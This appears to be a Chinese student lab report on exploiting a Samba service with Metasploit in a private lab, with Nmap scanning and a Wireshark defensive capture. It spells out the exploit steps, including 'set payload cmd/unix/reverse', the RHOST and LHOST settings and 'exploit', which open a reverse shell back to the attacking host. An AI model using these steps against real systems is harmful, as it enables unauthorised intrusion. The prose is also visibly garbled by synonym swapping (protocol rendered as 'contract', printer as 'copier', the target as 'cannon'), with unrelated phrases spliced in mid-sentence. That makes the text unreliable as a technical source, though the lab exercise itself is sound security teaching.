目录
一.知识点梳理与总结
1.目前,Linux已然成为服务器操作最流行的选择,虽然Linux在安全设计上较Windows等一些操作系统具有一定的先天优势linux操作系统培训,但它也决不是原先一些人所觉得的“绝对安全”。Linux操作系统也存在着大量的安全漏洞,因为它的开源特点,黑客们反倒更容易从源码中发觉更多的Linux系统内核及开源软件中的漏洞,系统管理员对Linux服务器的忙于管理也促使近些年来针对Linux系统的安全风波多有发生。
本次实践针对Linux系统存在漏洞进行远程渗透功击,使用的工具为Metasploit,据悉在进行攻守对抗过程中,还使用到了Nmap、Neusse等信息收集工具。
2.SMB(ServerMessageBlock)合同是实现不同类型计算机之间文件和复印机共享服务的合同。
SMB的工作原理就是让NetBIOS合同与SMB合同运行在TCP/IP合同之上,而且借助NetBIOS的名子解析功能让Linux计算机可以在Windows计算机之间互相访问共享文件和复印机的功能。
3.Samba是一组使linux支持SMB合同的软件,基于GPL原则发行linux内核中网络协议的设计与实现,源码完全公开。Samba的核心是两个守护进程smbd和nmbd.smbd守护进程负责构建对话linux内核中网络协议的设计与实现,验证用户提供文件和复印机共享服务等。nmbd守护进程负责实现网路浏览。
1.SMB合同2.Samba二.实验过程1.使用Metasploit进行Linux远程渗透功击
本次实验使用的功击机为Kali,IP地址为192.168.200.8;机炮为MetasploitUbuntu,IP地址为192.168.200.124:
首先在Kali上打开Metasploit:
查找要使用的漏洞对应的模块
searchsamba
对应编号是13,为此,use13即可使用该模块。
查看可用荷载showpayloads
选择功击荷载setpayloadcmd/unix/reverse
查看须要配置的参数showoptions
配置相应的参数
setRHOST192.168.200.124,setLHOST192.168.200.8
只需配置机炮IP即可
设置完成后,输入exploit进行功击
可以看见早已功击成功
2.攻守对抗实践
二人联接到同一个局域网中,功击机kali和火箭炮metasploit的IP地址分别为192.168.200.8和192.168.200.124
测试下它们的连通性
ping192.168.200.124
ping通以后
使用nmap-sV192.168.200.124扫描目标主机的开放端口与版本号等信息:
使用nmap--scriptvuln192.168.200.124扫描目标主机存在的漏洞:
功击采用的渗透模块依然是第一个实验中使用的模块,输入searchsamba
use13
此次选择第五个payloads
可以看见功击成功
逼抢方窃听:对第二次的功击进行逼抢
借助wireshark对网卡进行窃听,从中可以剖析得到,功击者IP为192.168.200.8,功击者借助的是139端口进行功击,在功击成功后进行了ifconfig等操作
三.学习中遇见的问题
问题1.在看wireshark数据包时,不晓得如何剖析出功击者是借助那个端口(服务)的漏洞进行功击的
解决:经过寻问朋友linux系统,得知从抓取数据包找最前面一个包的端口信息,对端口的理解也更深
四.学习体会
在实验中会碰到一些不理解的步骤,解决后会认为受益颇丰。从之前理解不是很到位的端口和网关,每一次亲自试错解决就会觉得收获很大。
通过本次使用Metasploit进行Linux远程渗透功击,首先进一步熟悉了Metasploit工具的使用,其次通过攻守对抗过程,动手进行了从漏洞信息收集、漏洞借助、渗透功击到获取目标主机权限的过程,提升了自己的实践能力。
本文原创地址://lrxjmw.cn/kyyylxtnhjky.html编辑:刘遄,审核员:暂无